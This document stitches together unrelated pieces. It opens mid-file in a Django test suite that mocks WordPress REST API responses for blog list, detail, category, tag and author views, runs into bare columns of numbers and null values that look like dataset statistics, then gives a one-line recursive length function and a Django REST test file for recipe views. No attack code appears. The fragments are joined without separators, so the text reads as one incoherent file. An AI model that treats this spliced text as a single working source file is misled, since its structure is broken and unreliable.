'count': 1, 'description': '', 'id': 1, 'link': 'https://example.com/blog/tag/test/', 'meta': [], 'name': 'test', 'slug': 'test', '_links': { 'about': [ { 'href': 'https://example.com/wp-json/wp/v2/taxonomies/post_tag' } ], 'collection': [ { 'href': 'https://example.com/wp-json/wp/v2/tags' } ], 'curies': [ { 'href': 'https://api.w.org/{rel}', 'name': 'wp', 'templated': True } ], 'self': [{ 'href': 'https://example.com/wp-json/wp/v2/tags/1' }], 'wp:post_type': [ { 'href': 'https://example.com/wp-json/wp/v2/posts?tags=1' } ] }, 'taxonomy': 'post_tag'}], content_type='application/json') responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/categories/', status=200, json=[{ 'count': 4, 'description': '', 'id': 1, 'link': 'https://example.com/blog/category/test/', 'meta': [], 'name': 'test', 'slug': 'test', '_links': { 'about': [ { 'href': 'https://example.com/wp-json/wp/v2/taxonomies/category' } ], 'collection': [ { 'href': 'https://example.com/wp-json/wp/v2/categories' } ], 'curies': [ { 'href': 'https://api.w.org/{rel}', 'name': 'wp', 'templated': True } ], 'self': [ { 'href': 'https://example.com/wp-json/wp/v2/categories/1' } ], 'wp:post_type': [ { 'href': 'https://example.com/wp-json/wp/v2/posts?categories=1' } ] }, 'taxonomy': 'category'}], content_type='application/json') response = self.client.get(reverse('wordpress_api_blog_list')) self.assertEqual(response.status_code, 200) @responses.activate def test_blog_list_view_return_404_if_server_error(self): """ If there is a problem with the wp server, it should return 404 """ response = self.client.get(reverse('wordpress_api_blog_list')) self.assertEqual(response.status_code, 404) @responses.activate def test_blog_list_view_return_404_if_connection_error(self): """ If the server returns something different that 200, it should return 404 """ responses.add(responses.GET, settings.WP_URL + 'wp-json/wp/v2/posts/', status=404, content_type='application/json') responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/users/', status=200, json=[{ "id": 2, "name": "test-slug", "url": "", "description": "", "link": "https://example.com/blog/author/test-slug/", "slug": "test-slug", "avatar_urls": { "24": "https://example.com/test-avatar", }, "meta": [], "_links": { "self": [ { "href": "https://example.com/wp-json/wp/v2/users/2" } ], "collection": [ { "href": "https://example.com/wp-json/wp/v2/users" } ] } }], content_type='application/json') responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/tags/', status=200, json=[{ 'count': 1, 'description': '', 'id': 1, 'link': 'https://example.com/blog/tag/test/', 'meta': [], 'name': 'test', 'slug': 'test', '_links': { 'about': [ { 'href': 'https://example.com/wp-json/wp/v2/taxonomies/post_tag' } ], 'collection': [ { 'href': 'https://example.com/wp-json/wp/v2/tags' } ], 'curies': [ { 'href': 'https://api.w.org/{rel}', 'name': 'wp', 'templated': True } ], 'self': [{ 'href': 'https://example.com/wp-json/wp/v2/tags/1' }], 'wp:post_type': [ { 'href': 'https://example.com/wp-json/wp/v2/posts?tags=1' } ] }, 'taxonomy': 'post_tag'}], content_type='application/json') responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/categories/', status=200, json=[{ 'count': 4, 'description': '', 'id': 1, 'link': 'https://example.com/blog/category/test/', 'meta': [], 'name': 'test', 'slug': 'test', '_links': { 'about': [ { 'href': 'https://example.com/wp-json/wp/v2/taxonomies/category' } ], 'collection': [ { 'href': 'https://example.com/wp-json/wp/v2/categories' } ], 'curies': [ { 'href': 'https://api.w.org/{rel}', 'name': 'wp', 'templated': True } ], 'self': [ { 'href': 'https://example.com/wp-json/wp/v2/categories/1' } ], 'wp:post_type': [ { 'href': 'https://example.com/wp-json/wp/v2/posts?categories=1' } ] }, 'taxonomy': 'category'}], content_type='application/json') response = self.client.get(reverse('wordpress_api_blog_list')) self.assertEqual(response.status_code, 404) @responses.activate def test_blog_list_view_return_404_if_no_blogs(self): """ If the server returns an empty list, it should return 404 """ responses.add(responses.GET, settings.WP_URL + 'wp-json/wp/v2/posts/', status=200, json=[], content_type='application/json') responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/users/', status=200, json=[{ "id": 2, "name": "test-slug", "url": "", "description": "", "link": "https://example.com/blog/author/test-slug/", "slug": "test-slug", "avatar_urls": { "24": "https://example.com/test-avatar", }, "meta": [], "_links": { "self": [ { "href": "https://example.com/wp-json/wp/v2/users/2" } ], "collection": [ { "href": "https://example.com/wp-json/wp/v2/users" } ] } }], content_type='application/json') responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/tags/', status=200, json=[{ 'count': 1, 'description': '', 'id': 1, 'link': 'https://example.com/blog/tag/test/', 'meta': [], 'name': 'test', 'slug': 'test', '_links': { 'about': [ { 'href': 'https://example.com/wp-json/wp/v2/taxonomies/post_tag' } ], 'collection': [ { 'href': 'https://example.com/wp-json/wp/v2/tags' } ], 'curies': [ { 'href': 'https://api.w.org/{rel}', 'name': 'wp', 'templated': True } ], 'self': [{ 'href': 'https://example.com/wp-json/wp/v2/tags/1' }], 'wp:post_type': [ { 'href': 'https://example.com/wp-json/wp/v2/posts?tags=1' } ] }, 'taxonomy': 'post_tag'}], content_type='application/json') responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/categories/', status=200, json=[{ 'count': 4, 'description': '', 'id': 1, 'link': 'https://example.com/blog/category/test/', 'meta': [], 'name': 'test', 'slug': 'test', '_links': { 'about': [ { 'href': 'https://example.com/wp-json/wp/v2/taxonomies/category' } ], 'collection': [ { 'href': 'https://example.com/wp-json/wp/v2/categories' } ], 'curies': [ { 'href': 'https://api.w.org/{rel}', 'name': 'wp', 'templated': True } ], 'self': [ { 'href': 'https://example.com/wp-json/wp/v2/categories/1' } ], 'wp:post_type': [ { 'href': 'https://example.com/wp-json/wp/v2/posts?categories=1' } ] }, 'taxonomy': 'category'}], content_type='application/json') response = self.client.get(reverse('wordpress_api_blog_list')) self.assertEqual(response.status_code, 404) # BlogView @responses.activate def test_blog_view_return_200(self): """ If the wp client gets information, it should return a 200 """ responses.add(responses.GET, settings.WP_URL + 'wp-json/wp/v2/posts/', **self.default_response_kwargs) responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/users/', status=200, json=[{ "id": 2, "name": "test-slug", "url": "", "description": "", "link": "https://example.com/blog/author/test-slug/", "slug": "test-slug", "avatar_urls": { "24": "https://example.com/test-avatar", }, "meta": [], "_links": { "self": [ { "href": "https://example.com/wp-json/wp/v2/users/2" } ], "collection": [ { "href": "https://example.com/wp-json/wp/v2/users" } ] } }], content_type='application/json') responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/tags/', status=200, json=[{ 'count': 1, 'description': '', 'id': 1, 'link': 'https://example.com/blog/tag/test/', 'meta': [], 'name': 'test', 'slug': 'test', '_links': { 'about': [ { 'href': 'https://example.com/wp-json/wp/v2/taxonomies/post_tag' } ], 'collection': [ { 'href': 'https://example.com/wp-json/wp/v2/tags' } ], 'curies': [ { 'href': 'https://api.w.org/{rel}', 'name': 'wp', 'templated': True } ], 'self': [{ 'href': 'https://example.com/wp-json/wp/v2/tags/1' }], 'wp:post_type': [ { 'href': 'https://example.com/wp-json/wp/v2/posts?tags=1' } ] }, 'taxonomy': 'post_tag'}], content_type='application/json') responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/categories/', status=200, json=[{ 'count': 4, 'description': '', 'id': 1, 'link': 'https://example.com/blog/category/test/', 'meta': [], 'name': 'test', 'slug': 'test', '_links': { 'about': [ { 'href': 'https://example.com/wp-json/wp/v2/taxonomies/category' } ], 'collection': [ { 'href': 'https://example.com/wp-json/wp/v2/categories' } ], 'curies': [ { 'href': 'https://api.w.org/{rel}', 'name': 'wp', 'templated': True } ], 'self': [ { 'href': 'https://example.com/wp-json/wp/v2/categories/1' } ], 'wp:post_type': [ { 'href': 'https://example.com/wp-json/wp/v2/posts?categories=1' } ] }, 'taxonomy': 'category'}], content_type='application/json') response = self.client.get( reverse('wordpress_api_blog_detail', args=('test-blog',))) self.assertEqual(response.status_code, 200) @responses.activate def test_blog_view_return_404_if_server_status(self): """ If the server returns something different from 200, it raises 404 """ responses.add(responses.GET, settings.WP_URL + 'wp-json/wp/v2/posts/', status=404, content_type='application/json') responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/users/', status=200, json=[{ "id": 2, "name": "test-slug", "url": "", "description": "", "link": "https://example.com/blog/author/test-slug/", "slug": "test-slug", "avatar_urls": { "24": "https://example.com/test-avatar", }, "meta": [], "_links": { "self": [ { "href": "https://example.com/wp-json/wp/v2/users/2" } ], "collection": [ { "href": "https://example.com/wp-json/wp/v2/users" } ] } }], content_type='application/json') responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/tags/', status=200, json=[{ 'count': 1, 'description': '', 'id': 1, 'link': 'https://example.com/blog/tag/test/', 'meta': [], 'name': 'test', 'slug': 'test', '_links': { 'about': [ { 'href': 'https://example.com/wp-json/wp/v2/taxonomies/post_tag' } ], 'collection': [ { 'href': 'https://example.com/wp-json/wp/v2/tags' } ], 'curies': [ { 'href': 'https://api.w.org/{rel}', 'name': 'wp', 'templated': True } ], 'self': [{ 'href': 'https://example.com/wp-json/wp/v2/tags/1' }], 'wp:post_type': [ { 'href': 'https://example.com/wp-json/wp/v2/posts?tags=1' } ] }, 'taxonomy': 'post_tag'}], content_type='application/json') responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/categories/', status=200, json=[{ 'count': 4, 'description': '', 'id': 1, 'link': 'https://example.com/blog/category/test/', 'meta': [], 'name': 'test', 'slug': 'test', '_links': { 'about': [ { 'href': 'https://example.com/wp-json/wp/v2/taxonomies/category' } ], 'collection': [ { 'href': 'https://example.com/wp-json/wp/v2/categories' } ], 'curies': [ { 'href': 'https://api.w.org/{rel}', 'name': 'wp', 'templated': True } ], 'self': [ { 'href': 'https://example.com/wp-json/wp/v2/categories/1' } ], 'wp:post_type': [ { 'href': 'https://example.com/wp-json/wp/v2/posts?categories=1' } ] }, 'taxonomy': 'category'}], content_type='application/json') response = self.client.get( reverse('wordpress_api_blog_detail', args=('test-blog',))) self.assertEqual(response.status_code, 404) @responses.activate def test_blog_view_return_404_if_no_blog(self): """ if no blog, it should raise 404 """ responses.add(responses.GET, settings.WP_URL + 'wp-json/wp/v2/posts/', status=200, json=[], content_type='application/json') responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/users/', status=200, json=[{ "id": 2, "name": "test-slug", "url": "", "description": "", "link": "https://example.com/blog/author/test-slug/", "slug": "test-slug", "avatar_urls": { "24": "https://example.com/test-avatar", }, "meta": [], "_links": { "self": [ { "href": "https://example.com/wp-json/wp/v2/users/2" } ], "collection": [ { "href": "https://example.com/wp-json/wp/v2/users" } ] } }], content_type='application/json') responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/tags/', status=200, json=[{ 'count': 1, 'description': '', 'id': 1, 'link': 'https://example.com/blog/tag/test/', 'meta': [], 'name': 'test', 'slug': 'test', '_links': { 'about': [ { 'href': 'https://example.com/wp-json/wp/v2/taxonomies/post_tag' } ], 'collection': [ { 'href': 'https://example.com/wp-json/wp/v2/tags' } ], 'curies': [ { 'href': 'https://api.w.org/{rel}', 'name': 'wp', 'templated': True } ], 'self': [{ 'href': 'https://example.com/wp-json/wp/v2/tags/1' }], 'wp:post_type': [ { 'href': 'https://example.com/wp-json/wp/v2/posts?tags=1' } ] }, 'taxonomy': 'post_tag'}], content_type='application/json') responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/categories/', status=200, json=[{ 'count': 4, 'description': '', 'id': 1, 'link': 'https://example.com/blog/category/test/', 'meta': [], 'name': 'test', 'slug': 'test', '_links': { 'about': [ { 'href': 'https://example.com/wp-json/wp/v2/taxonomies/category' } ], 'collection': [ { 'href': 'https://example.com/wp-json/wp/v2/categories' } ], 'curies': [ { 'href': 'https://api.w.org/{rel}', 'name': 'wp', 'templated': True } ], 'self': [ { 'href': 'https://example.com/wp-json/wp/v2/categories/1' } ], 'wp:post_type': [ { 'href': 'https://example.com/wp-json/wp/v2/posts?categories=1' } ] }, 'taxonomy': 'category'}], content_type='application/json') response = self.client.get( reverse('wordpress_api_blog_detail', args=('test-blog',))) self.assertEqual(response.status_code, 404) @responses.activate def test_blog_view_return_404_if_server_error(self): """ If there is a problem with the wp server, it should return 404 """ response = self.client.get( reverse('wordpress_api_blog_detail', args=('test-blog',))) self.assertEqual(response.status_code, 404) # CategoryBlogListView @responses.activate def test_category_view_return_200(self): """ If the wp client gets information, it should return a 200 """ responses.add(responses.GET, settings.WP_URL + 'wp-json/wp/v2/posts/', **self.default_response_kwargs) responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/users/', status=200, json=[{ "id": 2, "name": "test-slug", "url": "", "description": "", "link": "https://example.com/blog/author/test-slug/", "slug": "test-slug", "avatar_urls": { "24": "https://example.com/test-avatar", }, "meta": [], "_links": { "self": [ { "href": "https://example.com/wp-json/wp/v2/users/2" } ], "collection": [ { "href": "https://example.com/wp-json/wp/v2/users" } ] } }], content_type='application/json') responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/tags/', status=200, json=[{ 'count': 1, 'description': '', 'id': 1, 'link': 'https://example.com/blog/tag/test/', 'meta': [], 'name': 'test', 'slug': 'test', '_links': { 'about': [ { 'href': 'https://example.com/wp-json/wp/v2/taxonomies/post_tag' } ], 'collection': [ { 'href': 'https://example.com/wp-json/wp/v2/tags' } ], 'curies': [ { 'href': 'https://api.w.org/{rel}', 'name': 'wp', 'templated': True } ], 'self': [{ 'href': 'https://example.com/wp-json/wp/v2/tags/1' }], 'wp:post_type': [ { 'href': 'https://example.com/wp-json/wp/v2/posts?tags=1' } ] }, 'taxonomy': 'post_tag'}], content_type='application/json') responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/categories/', status=200, json=[{ 'count': 4, 'description': '', 'id': 1, 'link': 'https://example.com/blog/category/test/', 'meta': [], 'name': 'test', 'slug': 'test', '_links': { 'about': [ { 'href': 'https://example.com/wp-json/wp/v2/taxonomies/category' } ], 'collection': [ { 'href': 'https://example.com/wp-json/wp/v2/categories' } ], 'curies': [ { 'href': 'https://api.w.org/{rel}', 'name': 'wp', 'templated': True } ], 'self': [ { 'href': 'https://example.com/wp-json/wp/v2/categories/1' } ], 'wp:post_type': [ { 'href': 'https://example.com/wp-json/wp/v2/posts?categories=1' } ] }, 'taxonomy': 'category'}], content_type='application/json') response = self.client.get( reverse('wordpress_api_blog_category_list', args=('test',))) self.assertEqual(response.status_code, 200) @responses.activate def test_category_view_return_404_if_category_not_exists(self): """ If the category does not exists, it returns 404 """ responses.add(responses.GET, settings.WP_URL + 'wp-json/wp/v2/posts/', **self.default_response_kwargs) responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/users/', status=200, json=[{ "id": 2, "name": "test-slug", "url": "", "description": "", "link": "https://example.com/blog/author/test-slug/", "slug": "test-slug", "avatar_urls": { "24": "https://example.com/test-avatar", }, "meta": [], "_links": { "self": [ { "href": "https://example.com/wp-json/wp/v2/users/2" } ], "collection": [ { "href": "https://example.com/wp-json/wp/v2/users" } ] } }], content_type='application/json') responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/tags/', status=200, json=[{ 'count': 1, 'description': '', 'id': 1, 'link': 'https://example.com/blog/tag/test/', 'meta': [], 'name': 'test', 'slug': 'test', '_links': { 'about': [ { 'href': 'https://example.com/wp-json/wp/v2/taxonomies/post_tag' } ], 'collection': [ { 'href': 'https://example.com/wp-json/wp/v2/tags' } ], 'curies': [ { 'href': 'https://api.w.org/{rel}', 'name': 'wp', 'templated': True } ], 'self': [{ 'href': 'https://example.com/wp-json/wp/v2/tags/1' }], 'wp:post_type': [ { 'href': 'https://example.com/wp-json/wp/v2/posts?tags=1' } ] }, 'taxonomy': 'post_tag'}], content_type='application/json') responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/categories/', status=200, json=[{ 'count': 4, 'description': '', 'id': 1, 'link': 'https://example.com/blog/category/test/', 'meta': [], 'name': 'test', 'slug': 'test', '_links': { 'about': [ { 'href': 'https://example.com/wp-json/wp/v2/taxonomies/category' } ], 'collection': [ { 'href': 'https://example.com/wp-json/wp/v2/categories' } ], 'curies': [ { 'href': 'https://api.w.org/{rel}', 'name': 'wp', 'templated': True } ], 'self': [ { 'href': 'https://example.com/wp-json/wp/v2/categories/1' } ], 'wp:post_type': [ { 'href': 'https://example.com/wp-json/wp/v2/posts?categories=1' } ] }, 'taxonomy': 'category'}], content_type='application/json') response = self.client.get( reverse('wordpress_api_blog_category_list', args=('not-existing',))) self.assertEqual(response.status_code, 404) @responses.activate def test_category_view_return_404_if_server_error(self): """ If there is a problem with the wp server, it should return 404 """ response = self.client.get( reverse('wordpress_api_blog_category_list', args=('test-category',))) self.assertEqual(response.status_code, 404) # TagBlogListView @responses.activate def test_tag_view_return_200(self): """ If the wp client gets information, it should return a 200 """ responses.add(responses.GET, settings.WP_URL + 'wp-json/wp/v2/posts/', **self.default_response_kwargs) responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/users/', status=200, json=[{ "id": 2, "name": "test-slug", "url": "", "description": "", "link": "https://example.com/blog/author/test-slug/", "slug": "test-slug", "avatar_urls": { "24": "https://example.com/test-avatar", }, "meta": [], "_links": { "self": [ { "href": "https://example.com/wp-json/wp/v2/users/2" } ], "collection": [ { "href": "https://example.com/wp-json/wp/v2/users" } ] } }], content_type='application/json') responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/tags/', status=200, json=[{ 'count': 1, 'description': '', 'id': 1, 'link': 'https://example.com/blog/tag/test/', 'meta': [], 'name': 'test', 'slug': 'test', '_links': { 'about': [ { 'href': 'https://example.com/wp-json/wp/v2/taxonomies/post_tag' } ], 'collection': [ { 'href': 'https://example.com/wp-json/wp/v2/tags' } ], 'curies': [ { 'href': 'https://api.w.org/{rel}', 'name': 'wp', 'templated': True } ], 'self': [{ 'href': 'https://example.com/wp-json/wp/v2/tags/1' }], 'wp:post_type': [ { 'href': 'https://example.com/wp-json/wp/v2/posts?tags=1' } ] }, 'taxonomy': 'post_tag'}], content_type='application/json') responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/categories/', status=200, json=[{ 'count': 4, 'description': '', 'id': 1, 'link': 'https://example.com/blog/category/test/', 'meta': [], 'name': 'test', 'slug': 'test', '_links': { 'about': [ { 'href': 'https://example.com/wp-json/wp/v2/taxonomies/category' } ], 'collection': [ { 'href': 'https://example.com/wp-json/wp/v2/categories' } ], 'curies': [ { 'href': 'https://api.w.org/{rel}', 'name': 'wp', 'templated': True } ], 'self': [ { 'href': 'https://example.com/wp-json/wp/v2/categories/1' } ], 'wp:post_type': [ { 'href': 'https://example.com/wp-json/wp/v2/posts?categories=1' } ] }, 'taxonomy': 'category'}], content_type='application/json') response = self.client.get( reverse('wordpress_api_blog_tag_list', args=('test',))) self.assertEqual(response.status_code, 200) @responses.activate def test_tag_view_return_404_if_tag_not_exists(self): """ If the tag does not exists, the view returns 404 """ responses.add(responses.GET, settings.WP_URL + 'wp-json/wp/v2/posts/', **self.default_response_kwargs) responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/users/', status=200, json=[{ "id": 2, "name": "test-slug", "url": "", "description": "", "link": "https://example.com/blog/author/test-slug/", "slug": "test-slug", "avatar_urls": { "24": "https://example.com/test-avatar", }, "meta": [], "_links": { "self": [ { "href": "https://example.com/wp-json/wp/v2/users/2" } ], "collection": [ { "href": "https://example.com/wp-json/wp/v2/users" } ] } }], content_type='application/json') responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/tags/', status=200, json=[{ 'count': 1, 'description': '', 'id': 1, 'link': 'https://example.com/blog/tag/test/', 'meta': [], 'name': 'test', 'slug': 'test', '_links': { 'about': [ { 'href': 'https://example.com/wp-json/wp/v2/taxonomies/post_tag' } ], 'collection': [ { 'href': 'https://example.com/wp-json/wp/v2/tags' } ], 'curies': [ { 'href': 'https://api.w.org/{rel}', 'name': 'wp', 'templated': True } ], 'self': [{ 'href': 'https://example.com/wp-json/wp/v2/tags/1' }], 'wp:post_type': [ { 'href': 'https://example.com/wp-json/wp/v2/posts?tags=1' } ] }, 'taxonomy': 'post_tag'}], content_type='application/json') responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/categories/', status=200, json=[{ 'count': 4, 'description': '', 'id': 1, 'link': 'https://example.com/blog/category/test/', 'meta': [], 'name': 'test', 'slug': 'test', '_links': { 'about': [ { 'href': 'https://example.com/wp-json/wp/v2/taxonomies/category' } ], 'collection': [ { 'href': 'https://example.com/wp-json/wp/v2/categories' } ], 'curies': [ { 'href': 'https://api.w.org/{rel}', 'name': 'wp', 'templated': True } ], 'self': [ { 'href': 'https://example.com/wp-json/wp/v2/categories/1' } ], 'wp:post_type': [ { 'href': 'https://example.com/wp-json/wp/v2/posts?categories=1' } ] }, 'taxonomy': 'category'}], content_type='application/json') response = self.client.get( reverse('wordpress_api_blog_tag_list', args=('not-existing',))) self.assertEqual(response.status_code, 404) @responses.activate def test_tag_view_return_404_if_server_error(self): """ If there is a problem with the wp server, it should return 404 """ response = self.client.get( reverse('wordpress_api_blog_tag_list', args=('test-tag',))) self.assertEqual(response.status_code, 404) # BlogByAuthorListView @responses.activate def test_author_view_return_200(self): """ If the wp client gets information, it should return a 200 """ responses.add(responses.GET, settings.WP_URL + 'wp-json/wp/v2/posts/', **self.default_response_kwargs) responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/tags/', **self.default_response_kwargs) responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/categories/', **self.default_response_kwargs) responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/users/', status=200, json=[{ "id": 2, "name": "test-slug", "url": "", "description": "", "link": "https://example.com/blog/author/test-slug/", "slug": "test-slug", "avatar_urls": { "24": "https://example.com/test-avatar", }, "meta": [], "_links": { "self": [ { "href": "https://example.com/wp-json/wp/v2/users/2" } ], "collection": [ { "href": "https://example.com/wp-json/wp/v2/users" } ] } }], content_type='application/json') response = self.client.get( reverse('wordpress_api_blog_by_author_list', args=('test-slug',))) self.assertEqual(response.status_code, 200) @responses.activate def test_author_view_return_404_if_author_does_not_exists(self): """ If the author does not exists, it raises 404 """ responses.add(responses.GET, settings.WP_URL + 'wp-json/wp/v2/posts/', **self.default_response_kwargs) responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/tags/', **self.default_response_kwargs) responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/categories/', **self.default_response_kwargs) responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/users/', status=200, json=[{ "id": 2, "name": "test-slug", "url": "", "description": "", "link": "https://example.com/blog/author/test-slug/", "slug": "test-slug", "avatar_urls": { "24": "https://example.com/test-avatar", }, "meta": [], "_links": { "self": [ { "href": "https://example.com/wp-json/wp/v2/users/2" } ], "collection": [ { "href": "https://example.com/wp-json/wp/v2/users" } ] } }], content_type='application/json') response = self.client.get( reverse('wordpress_api_blog_by_author_list', args=('not-existing',))) self.assertEqual(response.status_code, 404) @responses.activate def test_author_view_return_404_if_server_error(self): """ If there is a problem with the wp server, it should return 404 """ response = self.client.get( reverse('wordpress_api_blog_by_author_list', args=('test-slug',))) self.assertEqual(response.status_code, 404) @responses.activate def test_author_view_return_404_no_blogs(self): """ If the wp client get no blogs, returns 404 """ responses.add(responses.GET, settings.WP_URL + 'wp-json/wp/v2/posts/', json=[], status=200, content_type='application/json') responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/tags/', **self.default_response_kwargs) responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/categories/', **self.default_response_kwargs) responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/users/', status=200, json=[{ "id": 2, "name": "test-slug", "url": "", "description": "", "link": "https://example.com/blog/author/test-slug/", "slug": "test-slug", "avatar_urls": { "24": "https://example.com/test-avatar", }, "meta": [], "_links": { "self": [ { "href": "https://example.com/wp-json/wp/v2/users/2" } ], "collection": [ { "href": "https://example.com/wp-json/wp/v2/users" } ] } }], content_type='application/json') response = self.client.get( reverse('wordpress_api_blog_by_author_list', args=('test-slug',))) self.assertEqual(response.status_code, 404)
36.422072
91
0.364687
5,835
75,248
4.598286
0.038046
0.045843
0.061123
0.076404
0.911073
0.896538
0.889009
0.881667
0.874474
0.866386
0
0.020802
0.504891
75,248
2,065
92
36.439709
0.699377
0.041862
0
0.720716
0
0
0.249809
0.013409
0
0
0
0
0.023861
1
0.020607
false
0
0.003254
0
0.024946
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
1
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
8
c705a2134af86dc44de2411889383b96c8fd5d9d
76
py
Python
src/recursive_len/__init__.py
finico/algorithms-python
92ff5840445e50dfa8f4fb22899d70ced2d29584
[ "MIT" ]
null
null
null
src/recursive_len/__init__.py
finico/algorithms-python
92ff5840445e50dfa8f4fb22899d70ced2d29584
[ "MIT" ]
5
2018-08-31T11:13:55.000Z
2018-09-12T10:10:20.000Z
src/recursive_len/__init__.py
finico/algorithms-python
92ff5840445e50dfa8f4fb22899d70ced2d29584
[ "MIT" ]
1
2018-08-31T16:08:00.000Z
2018-08-31T16:08:00.000Z
def recursive_len(arr): return 1 + recursive_len(arr[1:]) if arr else 0
25.333333
51
0.697368
14
76
3.642857
0.642857
0.470588
0.588235
0
0
0
0
0
0
0
0
0.048387
0.184211
76
2
52
38
0.774194
0
0
0
0
0
0
0
0
0
0
0
0
1
0.5
false
0
0
0.5
1
0
1
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
1
0
0
7
c72ef21859e6ca99a6a574f94d73c38883aacf1d
15,310
py
Python
recipe_backend/recipes/tests/test_views.py
jbernal0019/Recipe_site
30090b521cac84156cf5f05429a12dd5889f8703
[ "MIT" ]
null
null
null
recipe_backend/recipes/tests/test_views.py
jbernal0019/Recipe_site
30090b521cac84156cf5f05429a12dd5889f8703
[ "MIT" ]
3
2020-02-12T01:22:24.000Z
2021-06-10T21:49:21.000Z
recipe_backend/recipes/tests/test_views.py
jbernal0019/Recipe_site
30090b521cac84156cf5f05429a12dd5889f8703
[ "MIT" ]
null
null
null
import json from unittest import mock from django.test import TestCase from django.urls import reverse from django.contrib.auth.models import User from rest_framework import status from recipes.models import Recipe from recipes.models import Ingredient from recipes.models import Step class ViewTests(TestCase): def setUp(self): self.username = 'foo' self.password = 'foopassword' self.email = 'dev@server.org' self.recipe_name = 'recipe1' self.content_type = 'application/vnd.collection+json' # create basic models # create a user user = User.objects.create_user(username=self.username, email=self.email, password=self.password) # create another user User.objects.create_user(username='another', email='another@server.org', password='another-pass') # create a recipe Recipe.objects.get_or_create(name=self.recipe_name, owner=user) class RecipeListViewTests(ViewTests): """ Test the recipe-list view. """ def setUp(self): super(RecipeListViewTests, self).setUp() self.create_read_url = reverse("recipe-list") self.post = json.dumps({ "template": {"data": [{"name": "name", "value": "another_recipe"}]}}) def test_recipe_create_success(self): self.client.login(username='another', password='another-pass') response = self.client.post(self.create_read_url, data=self.post, content_type=self.content_type) self.assertEqual(response.status_code, status.HTTP_201_CREATED) def test_recipe_create_failure_unauthenticated(self): response = self.client.post(self.create_read_url, data=self.post, content_type=self.content_type) self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED) def test_recipe_list_success_authenticated(self): self.client.login(username=self.username, password=self.password) response = self.client.get(self.create_read_url) self.assertContains(response, self.recipe_name) def test_plugin_list_success_unauthenticated(self): response = self.client.get(self.create_read_url) self.assertContains(response, self.recipe_name) class RecipeDetailViewTests(ViewTests): """ Test the recipe-detail view. """ def setUp(self): super(RecipeDetailViewTests, self).setUp() recipe = Recipe.objects.get(name=self.recipe_name) self.read_update_delete_url = reverse("recipe-detail", kwargs={"pk": recipe.id}) self.put = json.dumps({ "template": {"data": [{"name": "name", "value": "another_recipe"}]}}) def test_recipe_detail_success_authenticated(self): self.client.login(username=self.username, password=self.password) response = self.client.get(self.read_update_delete_url) self.assertContains(response, self.recipe_name) def test_recipe_detail_success_unauthenticated(self): response = self.client.get(self.read_update_delete_url) self.assertContains(response, self.recipe_name) def test_recipe_update_success(self): self.client.login(username=self.username, password=self.password) response = self.client.put(self.read_update_delete_url, data=self.put, content_type=self.content_type) self.assertContains(response, "another_recipe") def test_recipe_update_failure_unauthenticated(self): response = self.client.put(self.read_update_delete_url, data=self.put, content_type=self.content_type) self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED) def test_recipe_update_failure_access_denied(self): self.client.login(username='another', password='another-pass') response = self.client.put(self.read_update_delete_url, data=self.put, content_type=self.content_type) self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN) def test_recipe_delete_success(self): self.client.login(username=self.username, password=self.password) response = self.client.delete(self.read_update_delete_url) self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT) self.assertEqual(Recipe.objects.count(), 0) def test_recipe_delete_failure_unauthenticated(self): response = self.client.delete(self.read_update_delete_url) self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED) def test_recipe_delete_failure_access_denied(self): self.client.login(username='another', password='another-pass') response = self.client.delete(self.read_update_delete_url) self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN) class RecipeListQuerySearchViewTests(ViewTests): """ Test the recipe-list-query-search view. """ def setUp(self): super(RecipeListQuerySearchViewTests, self).setUp() self.list_url = reverse("recipe-list-query-search") + '?owner_username=' + self.username def test_recipe_list_query_search_success_authenticated(self): self.client.login(username=self.username, password=self.password) response = self.client.get(self.list_url) self.assertContains(response, self.username) self.assertContains(response, self.recipe_name) def test_plugin_list_query_search_success_unauthenticated(self): response = self.client.get(self.list_url) self.assertContains(response, self.username) 